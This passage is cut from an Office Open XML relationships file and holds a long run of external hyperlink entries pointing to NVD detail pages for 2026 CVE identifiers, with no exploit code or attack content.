Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId3960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId3961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69562" TargetMode="External" Id="rId3962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69624" TargetMode="External" Id="rId3963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69626" TargetMode="External" Id="rId3964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId3965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69642" TargetMode="External" Id="rId3966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69719" TargetMode="External" Id="rId3967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69734" TargetMode="External" Id="rId3968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId3969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId3970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69855" TargetMode="External" Id="rId3971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId3972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70429" TargetMode="External" Id="rId3973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70489" TargetMode="External" Id="rId3974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70491" TargetMode="External" Id="rId3975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70493" TargetMode="External" Id="rId3976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71317" TargetMode="External" Id="rId3977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71437" TargetMode="External" Id="rId3978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72726" TargetMode="External" Id="rId3979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72739" TargetMode="External" Id="rId3980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72873" TargetMode="External" Id="rId3981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72907" TargetMode="External" Id="rId3982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72908" TargetMode="External" Id="rId3983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72938" TargetMode="External" Id="rId3984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72939" TargetMode="External" Id="rId3985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72942" TargetMode="External" Id="rId3986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72956" TargetMode="External" Id="rId3987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72974" TargetMode="External" Id="rId3988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72975" TargetMode="External" Id="rId3989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72977" TargetMode="External" Id="rId3990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId3991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73216" TargetMode="External" Id="rId3992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73245" TargetMode="External" Id="rId3993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73255" TargetMode="External" Id="rId3994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73258" TargetMode="External" Id="rId3995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73265" TargetMode="External" Id="rId3996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73424" TargetMode="External" Id="rId3997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73559" TargetMode="External" Id="rId3998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73788" TargetMode="External" Id="rId3999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75162" TargetMode="External" Id="rId4000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75163" TargetMode="External" Id="rId4001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75164" TargetMode="External" Id="rId4002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75165" TargetMode="External" Id="rId4003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75370" TargetMode="External" Id="rId4004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75466" TargetMode="External" Id="rId4005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75509" TargetMode="External" Id="rId4006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75602" TargetMode="External" Id="rId4007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75793" TargetMode="External" Id="rId4008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75861" TargetMode="External" Id="rId4009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75880" TargetMode="External" Id="rId4010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76000" TargetMode="External" Id="rId4011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId4012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId4013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77896" TargetMode="External" Id="rId4014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77911" TargetMode="External" Id="rId4015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78441" TargetMode="External" Id="rId4016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId4017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78481" TargetMode="External" Id="rId4018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78488" TargetMode="External" Id="rId4019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78502" TargetMode="External" Id="rId4020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78503" TargetMode="External" Id="rId4021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78515" TargetMode="External" Id="rId4022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78520" TargetMode="External" Id="rId4023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78522" TargetMode="External" Id="rId4024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78536" TargetMode="External" Id="rId4025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78658" TargetMode="External" Id="rId4026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78701" TargetMode="External" Id="rId4027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78838" TargetMode="External" Id="rId4028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78970" TargetMode="External" Id="rId4029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79513" TargetMode="External" Id="rId4030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79514" TargetMode="External" Id="rId4031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79522" TargetMode="External" Id="rId4032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79725" TargetMode="External" Id="rId4033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79728" TargetMode="External" Id="rId4034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80073" TargetMode="External" Id="rId4035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80076" TargetMode="External" Id="rId4036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80078" TargetMode="External" Id="rId4037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80079" TargetMode="External" Id="rId4038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80082" TargetMode="External" Id="rId4039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80084" TargetMode="External" Id="rId4040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80086" TargetMode="External" Id="rId4041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80087" TargetMode="External" Id="rId4042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80088" TargetMode="External" Id="rId4043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80089" TargetMode="External" Id="rId4044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80090" TargetMode="External" Id="rId4045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80091" TargetMode="External" Id="rId4046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80126" TargetMode="External" Id="rId4047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80128" TargetMode="External" Id="rId4048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80170" TargetMode="External" Id="rId4049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80177" TargetMode="External" Id="rId4050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81275" TargetMode="External" Id="rId4051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81377" TargetMode="External" Id="rId4052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId4053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81666" TargetMode="External" Id="rId4054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81782" TargetMode="External" Id="rId4055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81785" TargetMode="External" Id="rId4056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81787" TargetMode="External" Id="rId4057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81791" TargetMode="External" Id="rId4058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81792" TargetMode="External" Id="rId4059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81793" TargetMode="External" Id="rId4060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81802" TargetMode="External" Id="rId4061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82123" TargetMode="External" Id="rId4062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82299" TargetMode="External" Id="rId4063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84282" TargetMode="External" Id="rId4064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84306" TargetMode="External" Id="rId4065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84327" TargetMode="External" Id="rId4066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId4067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84377" TargetMode="External" Id="rId4068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId4069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84685" TargetMode="External" Id="rId4070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84828" TargetMode="External" Id="rId4071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84933" TargetMode="External" Id="rId4072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85044" TargetMode="External" Id="rId4073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85116" TargetMode="External" Id="rId4074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85117" TargetMode="External" Id="rId4075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85310" TargetMode="External" Id="rId4076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85769" TargetMode="External" Id="rId4077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86332" TargetMode="External" Id="rId4078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86488" TargetMode="External" Id="rId4079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86489" TargetMode="External" Id="rId4080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86490" TargetMode="External" Id="rId4081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86493" TargetMode="External" Id="rId4082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86495" TargetMode="External" Id="rId4083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86550" TargetMode="External" Id="rId4084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86597" TargetMode="External" Id="rId4085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86812" TargetMode="External" Id="rId4086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87014" TargetMode="External" Id="rId4087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87073" TargetMode="External" Id="rId4088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87106" TargetMode="External" Id="rId4089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87429" TargetMode="External" Id="rId4090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87436" TargetMode="External" Id="rId4091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87437" TargetMode="External" Id="rId4092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87441" TargetMode="External" Id="rId4093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87443" TargetMode="External" Id="rId4094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87446" TargetMode="External" Id="rId4095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87447" TargetMode="External" Id="rId4096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87454" TargetMode="External" Id="rId4097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87459" TargetMode="External" Id="rId4098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87468" TargetMode="External" Id="rId4099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87475" TargetMode="External" Id="rId4100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87476" TargetMode="External" Id="rId4101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87477" TargetMode="External" Id="rId4102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87478" TargetMode="External" Id="rId4103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87483" TargetMode="External" Id="rId4104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87490" TargetMode="External" Id="rId4105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87493" TargetMode="External" Id="rId4106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87503" TargetMode="External" Id="rId4107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87513" TargetMode="External" Id="rId4108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87515" TargetMode="External" Id="rId4109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87519" TargetMode="External" Id="rId4110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87522" TargetMode="External" Id="rId4111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87532" TargetMode="External" Id="rId4112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87535" TargetMode="External" Id="rId4113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87541" TargetMode="External" Id="rId4114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87545" TargetMode="External" Id="rId4115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87549" TargetMode="External" Id="rId4116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87565" TargetMode="External" Id="rId4117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87580" TargetMode="External" Id="rId4118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87584" TargetMode="External" Id="rId4119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87589" TargetMode="External" Id="rId4120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87591" TargetMode="External" Id="rId4121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87593" TargetMode="External" Id="rId4122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87600" TargetMode="External" Id="rId4123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87603" TargetMode="External" Id="rId4124" /><Relationship 